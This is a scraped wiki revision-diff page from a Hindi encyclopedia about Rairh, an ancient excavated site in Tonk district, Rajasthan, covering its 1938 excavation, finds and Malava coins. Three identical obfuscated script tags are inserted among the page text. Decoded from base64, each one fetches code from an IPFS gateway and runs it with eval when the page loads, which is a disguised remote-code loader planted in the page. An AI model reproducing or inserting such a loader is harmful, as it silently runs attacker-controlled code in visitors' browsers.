Difference between revisions of "रेढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *रेढ़ के प्राचीन स्थल जो राजस्थान के टो...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
*रेढ़ के प्राचीन स्थल जो [[राजस्थान]] के टोंक ज़िले में [[जयपुर]] से 27 किलोमीटर की दूरी स्थित है।
+
*रेढ़ एक प्राचीन स्थल जो [[राजस्थान]] के टोंक ज़िले में [[जयपुर]] से 27 किलोमीटर की दूरी स्थित है।
 
*इस प्राचीन स्थल का उत्खनन 1938 ई. में के. एन. पुरी द्वारा करवाया गया।  
 
*इस प्राचीन स्थल का उत्खनन 1938 ई. में के. एन. पुरी द्वारा करवाया गया।  
 
*रेढ़ में छोटे-छोटे टीले विस्तृत क्षेत्र में फैले हुए हैं। यहाँ से उत्खनन में प्राप्त सामग्री में मिट्टी के मकान, अनेक लौह उपहरण, प्रचुर में पाषाण मनके, मृण्मूर्तियाँ सम्मिलित हैं। यह सामग्री शुंग एवं शुंगोत्तर काल का प्रतिनिधित्व करती है।  
 
*रेढ़ में छोटे-छोटे टीले विस्तृत क्षेत्र में फैले हुए हैं। यहाँ से उत्खनन में प्राप्त सामग्री में मिट्टी के मकान, अनेक लौह उपहरण, प्रचुर में पाषाण मनके, मृण्मूर्तियाँ सम्मिलित हैं। यह सामग्री शुंग एवं शुंगोत्तर काल का प्रतिनिधित्व करती है।  
*रेढ़ से प्राप्त सेलखड़ी की डिबिया उन डिबियों के सदृश हैं, जिनमें [[महात्मा बुद्ध]] या बौद्ध भिक्षुओं के अवशेष स्तूपों में रखे जाते थे। *रेढ़ के उत्खनन से यह स्पष्ट रूप से परिलक्षित होता है कि यह स्थान तीसरी शताब्दी ई. पू. में एक विकसित नगर था, जो दूसरी शताब्दी ईस्वी तक पल्लवित होता रहा।  
+
*रेढ़ से प्राप्त सेलखड़ी की डिबिया उन डिबियों के सदृश हैं, जिनमें [[महात्मा बुद्ध]] या बौद्ध भिक्षुओं के अवशेष स्तूपों में रखे जाते थे।  
 +
*रेढ़ के उत्खनन से यह स्पष्ट रूप से परिलक्षित होता है कि यह स्थान तीसरी शताब्दी ई. पू. में एक विकसित नगर था, जो दूसरी शताब्दी ईस्वी तक पल्लवित होता रहा।  
 
*मालव सिक्कों एवं मालव मुद्राओं एवं आहत सिक्कों की उपलब्धि से यह निष्कर्ष निकाला गया कि यह मालवों का एक केन्द्र था, जो सम्भवत: मौर्य व शुंग शासकों के अधीन राज्य करते थे।  
 
*मालव सिक्कों एवं मालव मुद्राओं एवं आहत सिक्कों की उपलब्धि से यह निष्कर्ष निकाला गया कि यह मालवों का एक केन्द्र था, जो सम्भवत: मौर्य व शुंग शासकों के अधीन राज्य करते थे।  
  
Line 15: Line 16:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}
 +
[[Category:राजस्थान]]
 +
[[Category:राजस्थान_के_ऐतिहासिक_स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 
__INDEX__
 
__INDEX__

Revision as of 07:21, 4 July 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"
  • redh ek prachin sthal jo rajasthan ke toank zile mean jayapur se 27 kilomitar ki doori sthit hai.
  • is prachin sthal ka utkhanan 1938 ee. mean ke. en. puri dvara karavaya gaya.
  • redh mean chhote-chhote tile vistrit kshetr mean phaile hue haian. yahaan se utkhanan mean prapt samagri mean mitti ke makan, anek lauh upaharan, prachur mean pashan manake, mrinmoortiyaan sammilit haian. yah samagri shuang evan shuangottar kal ka pratinidhitv karati hai.
  • redh se prapt selakh di ki dibiya un dibiyoan ke sadrish haian, jinamean mahatma buddh ya bauddh bhikshuoan ke avashesh stoopoan mean rakhe jate the.
  • redh ke utkhanan se yah spasht roop se parilakshit hota hai ki yah sthan tisari shatabdi ee. poo. mean ek vikasit nagar tha, jo doosari shatabdi eesvi tak pallavit hota raha.
  • malav sikkoan evan malav mudraoan evan ahat sikkoan ki upalabdhi se yah nishkarsh nikala gaya ki yah malavoan ka ek kendr tha, jo sambhavat: maury v shuang shasakoan ke adhin rajy karate the.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>